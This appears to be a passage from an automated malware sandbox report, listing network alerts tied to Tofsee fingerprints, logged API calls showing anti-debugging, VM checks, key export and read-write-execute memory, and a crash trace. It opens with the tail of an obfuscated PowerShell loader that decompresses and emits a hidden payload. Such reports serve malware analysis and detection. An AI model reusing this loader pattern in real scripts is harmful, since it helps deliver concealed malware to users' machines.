16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf
        3036
      - powershell.exe powershell -
        612

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
117.18.232.200	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49175 -> 117.18.232.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49176 -> 117.18.232.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 117.18.232.200:443 -> 192.168.56.102:49177	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.102:49179 -> 117.18.232.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49180 -> 117.18.232.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 117.18.232.200:443 -> 192.168.56.102:49181	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (18 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 25, 2023, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 25, 2023, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 25, 2023, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 25, 2023, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 25, 2023, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 25, 2023, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 25, 2023, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 25, 2023, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 25, 2023, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 25, 2023, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 25, 2023, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 25, 2023, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 25, 2023, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 25, 2023, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 25, 2023, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 25, 2023, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 25, 2023, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 25, 2023, 10:36 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 25, 2023, 10:36 a.m.			0	0
IsDebuggerPresent July 25, 2023, 10:36 a.m.			0	0
IsDebuggerPresent July 25, 2023, 10:36 a.m.			0	0

Command line console output was observed (14 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 25, 2023, 10:37 a.m.	buffer: Bad numeric constant: 8d. console_handle: 0x0000000000000433	1	1
WriteConsoleW July 25, 2023, 10:37 a.m.	buffer: At line:11 char:3 console_handle: 0x000000000000043f	1	1
WriteConsoleW July 25, 2023, 10:37 a.m.	buffer: + 8d <<<< eC9CNJaLmANKSMTGJOJ9Pdrm7Z7Dk1L444+v+DzqpXQ9WlAMAKiZMSN1bAVkVZQv/Gla8 console_handle: 0x000000000000044b	1	1
WriteConsoleW July 25, 2023, 10:37 a.m.	buffer: I7ytIwf5 console_handle: 0x0000000000000457	1	1
WriteConsoleW July 25, 2023, 10:37 a.m.	buffer: + CategoryInfo : ParserError: (8d:String) [], ParentContainsError console_handle: 0x0000000000000463	1	1
WriteConsoleW July 25, 2023, 10:37 a.m.	buffer: RecordException console_handle: 0x000000000000046f	1	1
WriteConsoleW July 25, 2023, 10:37 a.m.	buffer: + FullyQualifiedErrorId : BadNumericConstant console_handle: 0x000000000000047b	1	1
WriteConsoleW July 25, 2023, 10:37 a.m.	buffer: Bad numeric constant: 8d. console_handle: 0x0000000000000837	1	1
WriteConsoleW July 25, 2023, 10:37 a.m.	buffer: At line:12 char:3 console_handle: 0x0000000000000843	1	1
WriteConsoleW July 25, 2023, 10:37 a.m.	buffer: + 8d <<<< eC9CNJaLmANKSMTGJOJ9Pdrm7Z7Dk1L444+v+DzqpXQ9WlAMAKiZMSN1bAVkVZQv/Gla8 console_handle: 0x000000000000084f	1	1
WriteConsoleW July 25, 2023, 10:37 a.m.	buffer: I7ytIwf5 console_handle: 0x000000000000085b	1	1
WriteConsoleW July 25, 2023, 10:37 a.m.	buffer: + CategoryInfo : ParserError: (8d:String) [], ParentContainsError console_handle: 0x0000000000000867	1	1
WriteConsoleW July 25, 2023, 10:37 a.m.	buffer: RecordException console_handle: 0x0000000000000873	1	1
WriteConsoleW July 25, 2023, 10:37 a.m.	buffer: + FullyQualifiedErrorId : BadNumericConstant console_handle: 0x000000000000087f	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 130 events)

Time & API	Arguments	Status	Return
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004a0330 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b514a20 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b514a20 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b514a20 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5149b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5149b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b514d30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b514d30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b514d30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b514d30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b515190 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b515190 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b515190 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004a0410 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004a0410 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004a0410 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004a08e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004a08e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004a08e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004a08e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004a08e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004a08e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004a08e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004a08e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004a0410 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004a0410 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004a0410 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b515660 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b515660 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b514fd0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b514fd0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5155f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5155f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5155f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b515820 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b515820 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b515820 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b515820 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b546890 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b546890 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000047d790 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000002cf58b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000002cf58b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000002cf58b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000002cf5b50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000002cf5b50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000002cf5c30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000002cf5c30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000002cf5c30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey July 25, 2023, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000002cf5c30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 25, 2023, 10:36 a.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ July 25, 2023, 10:36 a.m.	stacktrace: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda5a49d RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefddc73c3 ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefe0043bf IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdde5295 I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdde2799 Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefde8af1e Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefde8b76c NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdde48d6 CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefe130883 CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefe130ccd CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefe130c43 CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefdfea4f0 GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefdffd551 CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefe13347e CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefe13122b CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefe133542 GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefdffd42d GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefdffd1d6 TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x76ba9bd1 TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x76ba98da GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefdffd0ab CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefe123e57 ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefdfd0106 ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefdfd0182 BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7718652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x772bc521 exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00 exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d exception.instruction: add rsp, 0xc8 exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 42141 exception.address: 0x7fefda5a49d registers.r14: 0 registers.r15: 0 registers.rcx: 98494000 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 98499952 registers.r11: 98495760 registers.r8: 0 registers.r9: 0 registers.rdx: 1 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 1927509622 registers.r13: 0	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

July 25, 2023, 10:36 a.m.

stacktrace:

RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda5a49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefddc73c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefe0043bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdde5295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdde2799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefde8af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefde8b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdde48d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefe130883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefe130ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefe130c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefdfea4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefdffd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefe13347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefe13122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefe133542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefdffd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefdffd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x76ba9bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x76ba98da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefdffd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefe123e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefdfd0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefdfd0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7718652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x772bc521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefda5a49d
registers.r14: 0
registers.r15: 0
registers.rcx: 98494000
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 98499952
registers.r11: 98495760
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1927509622
registers.r13: 0

Performs some HTTP requests (1 event)

request

GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml

Allocates read-write-execute memory (usually to unpack itself) (50 out of 600 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 3060 region_size: 15208448 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000023d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000003250000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 3060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 3060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 3060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 3060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 3060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 3060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 3060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bad000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 3060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bd2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 3060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bb4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 3060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bd2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 3060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc1d5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 3060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc1d5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 3060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdc44000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 3060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdad1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 3060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076b9a000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 3060 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002890000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 3060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefa1b7000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 3060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef69c9000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 25, 2023, 10:36 a.m.	process_identifier: 3060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1b49000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 region_size: 2101248 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000031b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 25, 2023, 10:35 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000033b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
